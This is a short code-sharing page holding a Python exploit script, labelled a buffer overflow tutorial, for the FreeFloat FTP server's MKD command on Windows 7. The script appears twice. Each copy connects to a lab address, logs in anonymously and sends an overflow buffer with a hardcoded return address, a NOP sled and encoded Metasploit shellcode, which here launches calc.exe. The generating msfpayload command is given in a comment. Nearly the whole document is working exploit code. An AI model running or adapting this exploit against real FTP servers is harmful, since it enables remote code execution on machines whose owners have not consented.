gojhonny/freefloat_bo.py Secret

## freefloat_bo.py
# g0jhonny buffer overflow tutorial
# exploit: freefloat ftp mkd buffer overflow
# tested on windows 7, sp1 en

#!/usr/bin/python

import socket, sys

s = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
s.connect(('172.16.105.128', 21))

#msfpayload windows/exec CMD=calc.exe R | msfencode -b '\x00\x0A\x0D' -t c [*] x86/shikata_ga_nai succeeded with size 227 (iteration=1)

shellcode = ("\xba\xfa\x2b\x07\xa6\xdb\xc2\xd9\x74\x24\xf4\x5e\x29\xc9\xb1"
"\x33\x31\x56\x12\x03\x56\x12\x83\x3c\x2f\xe5\x53\x3c\xd8\x60"
"\x9b\xbc\x19\x13\x15\x59\x28\x01\x41\x2a\x19\x95\x01\x7e\x92"
"\x5e\x47\x6a\x21\x12\x40\x9d\x82\x99\xb6\x90\x13\x2c\x77\x7e"
"\xd7\x2e\x0b\x7c\x04\x91\x32\x4f\x59\xd0\x73\xad\x92\x80\x2c"
"\xba\x01\x35\x58\xfe\x99\x34\x8e\x75\xa1\x4e\xab\x49\x56\xe5"
"\xb2\x99\xc7\x72\xfc\x01\x63\xdc\xdd\x30\xa0\x3e\x21\x7b\xcd"
"\xf5\xd1\x7a\x07\xc4\x1a\x4d\x67\x8b\x24\x62\x6a\xd5\x61\x44"
"\x95\xa0\x99\xb7\x28\xb3\x59\xca\xf6\x36\x7c\x6c\x7c\xe0\xa4"
"\x8d\x51\x77\x2e\x81\x1e\xf3\x68\x85\xa1\xd0\x02\xb1\x2a\xd7"
"\xc4\x30\x68\xfc\xc0\x19\x2a\x9d\x51\xc7\x9d\xa2\x82\xaf\x42"
"\x07\xc8\x5d\x96\x31\x93\x0b\x69\xb3\xa9\x72\x69\xcb\xb1\xd4"
"\x02\xfa\x3a\xbb\x55\x03\xe9\xf8\xaa\x49\xb0\xa8\x22\x14\x20"
"\xe9\x2e\xa7\x9e\x2d\x57\x24\x2b\xcd\xac\x34\x5e\xc8\xe9\xf2"
"\xb2\xa0\x62\x97\xb4\x17\x82\xb2\xd6\xf6\x10\x5e\x37\x9d\x90"
"\xc5\x47")

buffer = 'A' * 247 + '\x5b\x4e\x8c\x76' + '\x90' * 22 + shellcode + '\x90' * 500

print s.recv(1024)
s.send('USER anonymous\r\n')
print s.recv(1024)
s.send('PASS anonymous\r\n')
print s.recv(1024)
s.send('MKD {}\r\n'.format(buffer))
print s.recv(1024)
s.send('QUIT\r\n')
s.close
	# g0jhonny buffer overflow tutorial
	# exploit: freefloat ftp mkd buffer overflow
	# tested on windows 7, sp1 en

	#!/usr/bin/python

	import socket, sys

	s = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
	s.connect(('172.16.105.128', 21))

	#msfpayload windows/exec CMD=calc.exe R \| msfencode -b '\x00\x0A\x0D' -t c [*] x86/shikata_ga_nai succeeded with size 227 (iteration=1)

	shellcode = ("\xba\xfa\x2b\x07\xa6\xdb\xc2\xd9\x74\x24\xf4\x5e\x29\xc9\xb1"
	"\x33\x31\x56\x12\x03\x56\x12\x83\x3c\x2f\xe5\x53\x3c\xd8\x60"
	"\x9b\xbc\x19\x13\x15\x59\x28\x01\x41\x2a\x19\x95\x01\x7e\x92"
	"\x5e\x47\x6a\x21\x12\x40\x9d\x82\x99\xb6\x90\x13\x2c\x77\x7e"
	"\xd7\x2e\x0b\x7c\x04\x91\x32\x4f\x59\xd0\x73\xad\x92\x80\x2c"
	"\xba\x01\x35\x58\xfe\x99\x34\x8e\x75\xa1\x4e\xab\x49\x56\xe5"
	"\xb2\x99\xc7\x72\xfc\x01\x63\xdc\xdd\x30\xa0\x3e\x21\x7b\xcd"
	"\xf5\xd1\x7a\x07\xc4\x1a\x4d\x67\x8b\x24\x62\x6a\xd5\x61\x44"
	"\x95\xa0\x99\xb7\x28\xb3\x59\xca\xf6\x36\x7c\x6c\x7c\xe0\xa4"
	"\x8d\x51\x77\x2e\x81\x1e\xf3\x68\x85\xa1\xd0\x02\xb1\x2a\xd7"
	"\xc4\x30\x68\xfc\xc0\x19\x2a\x9d\x51\xc7\x9d\xa2\x82\xaf\x42"
	"\x07\xc8\x5d\x96\x31\x93\x0b\x69\xb3\xa9\x72\x69\xcb\xb1\xd4"
	"\x02\xfa\x3a\xbb\x55\x03\xe9\xf8\xaa\x49\xb0\xa8\x22\x14\x20"
	"\xe9\x2e\xa7\x9e\x2d\x57\x24\x2b\xcd\xac\x34\x5e\xc8\xe9\xf2"
	"\xb2\xa0\x62\x97\xb4\x17\x82\xb2\xd6\xf6\x10\x5e\x37\x9d\x90"
	"\xc5\x47")

	buffer = 'A' * 247 + '\x5b\x4e\x8c\x76' + '\x90' * 22 + shellcode + '\x90' * 500

	print s.recv(1024)
	s.send('USER anonymous\r\n')
	print s.recv(1024)
	s.send('PASS anonymous\r\n')
	print s.recv(1024)
	s.send('MKD {}\r\n'.format(buffer))
	print s.recv(1024)
	s.send('QUIT\r\n')
	s.close